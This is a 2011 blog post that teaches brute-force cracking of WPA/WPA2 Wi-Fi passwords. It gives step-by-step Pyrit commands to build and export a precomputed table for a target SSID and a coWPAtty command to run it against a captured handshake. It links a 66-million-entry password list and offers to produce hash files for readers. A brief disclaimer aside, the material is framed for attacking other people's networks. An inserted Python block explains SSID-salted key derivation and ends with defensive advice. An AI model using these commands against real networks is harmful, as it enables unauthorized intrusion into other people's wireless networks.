Saturday, September 24, 2011

WiFi Cracking All Encryptions :)

Well, here is another way of cracking wireless passwords for all encryptions.

Note: Cracking/hacking wireless passwords is a crime and shouldn't be done illegally. This post is mainly for study. I take no responsibility for what you do with it.

OK, let's get started. First we need a lot of passwords; yes, whatever you're thinking is right, this is brute-forcing. :)

Don't worry about the passwords, download them from here: 66 Million Common Wireless Passwords.

First make sure that you have all of the requirements below:

A pentesting operating system like BackTrack / Blackbuntu etc.
A wireless network available nearby (can be any encryption)
A laptop with a compatible wireless card
Pyrit -> software (to download, search in Google)

Now boot up the operating system.

First you need to create the ESSID entry; for that you need the SSID of the target wireless network.

What is an SSID?
The name of the wireless network, typed exactly as broadcast, including spaces and special characters if present.

Type the command below to create the ESSID entry in Pyrit's database:

Create ESSID:
pyrit -e [SSID] create_essid

In place of [SSID], type the target SSID :)

Read the file into the database:
This is the file you downloaded (the passwords).

pyrit -i [Location and wordlist file] import_passwords

[Location and wordlist file] => the complete path to where you saved the passwords

At this point all of the words will have been added to the database. As a warning, this can sometimes use over 1 GB of RAM. Once they are read into the database, you can batch-process the word list for all SSIDs you have added to the database.
Now type:

pyrit batch

This will take quite a while, depending on your system. If you have enabled GPU acceleration in Pyrit it will speed things up considerably, but if your system is a few years old you might be waiting for a little while.

Once that is done, you can use the precomputed file to attack WPA networks faster, or export the file to be used on another system. This is how you export the file:

Type the following (as with create_essid above, Pyrit's options go before the command name):

pyrit -e [SSID] -o [File to be written to] batch

[SSID] => target SSID
[File to be written to] => where you want the file to be written

This will write out the database for that specific SSID to a coWPAtty binary file. That file can then be used with coWPAtty on any system and gives a speed-up of ~1000x compared to a straight dictionary attack. Exporting the file this way is also relatively fast, taking about the same amount of time as using Pyrit itself to attack the capture file. The only problem is that the Pyrit database is very slow to export as a db file, so slow that it is essentially useless to try. The db file is designed to be used with Aircrack, but don't waste your time: Pyrit has excellent support for coWPAtty and it is extremely efficient.

For use with coWPAtty (the capture file must contain a WPA handshake for that SSID):

cowpatty -r [capture file] -d [Cowpatty binary file] -s [SSID]

Performance is improved by 1000x by using this method.

Hopefully this helps if you want to attempt to crack a WPA/WPA2 network. Precomputing takes almost as long as using the word list directly to guess the password. The advantage: you can reuse the result against any network with the same SSID. So spending that little bit of extra time, or just leaving it running overnight, will prove valuable over a long period of cracking WPA networks.
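Why the precomputed table is tied to one SSID, as an added illustration (not code from the post or from Pyrit): WPA/WPA2-PSK derives the PMK with PBKDF2-HMAC-SHA1 using the SSID as the salt, so a table only matches networks with exactly that name, and every candidate passphrase costs 8192 HMAC calls per SSID. Only the Python standard library is used; the three-word list is constructed for the demo.

```python
import hashlib
from typing import Dict, Iterable

# WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 rounds, 32 bytes).
# The SSID is the salt, which is why Pyrit keeps a separate result set per ESSID.
PBKDF2_ROUNDS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key exactly as an 802.11 station does."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def precompute_table(wordlist: Iterable[str], ssid: str) -> Dict[str, bytes]:
    """What `pyrit batch` produces for one ESSID: passphrase -> PMK.
    Valid only for networks whose SSID matches byte for byte."""
    return {pw: derive_pmk(pw, ssid) for pw in wordlist}


def table_reusable(table_ssid: str, target_ssid: str) -> bool:
    """A table transfers to another network only if the SSID is identical (spaces,
    case and special characters included); renaming the network invalidates it."""
    return table_ssid == target_ssid


def hmac_evaluations(candidates: int) -> int:
    """HMAC-SHA1 calls needed to hash `candidates` passphrases for ONE SSID.
    32 bytes of output needs two 20-byte PBKDF2 blocks, each of 4096 rounds."""
    return candidates * PBKDF2_ROUNDS * 2


if __name__ == "__main__":
    # Constructed sample wordlist; the post's 66-million-entry list is just more of the same.
    words = ["password", "12345678", "letmein123"]
    table = precompute_table(words, "IEEE")
    # IEEE 802.11i Annex H test vector: f42c6fc52df0ebef...9710a12e
    print(table["password"].hex())
    # Same passphrase, different SSID -> different PMK, so the table is not reusable.
    print(derive_pmk("password", "IEEE") != derive_pmk("password", "ieee"))
    print(f"{hmac_evaluations(66_000_000):,} HMAC-SHA1 calls for the 66M list, per SSID")
```

The practical consequence for a network owner: a non-default SSID makes every shared or downloaded table worthless against that network, and a long random passphrase is never in the word list in the first place.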

If you are unable to generate a hash file relatively fast and effectively using your own system, I can generate one for you. I will then distribute it via torrent. It takes a substantial amount of time for me to write out the data to a file just because I am booting Blackbuntu off a USB stick right now, so it will probably take a good 12 hours for me to get the file to you. I am currently trying to find faster methods of getting it transferred (i.e. using an Ethernet, USB 3, or eSATA external storage device for Blackbuntu, possibly even a small SSD).
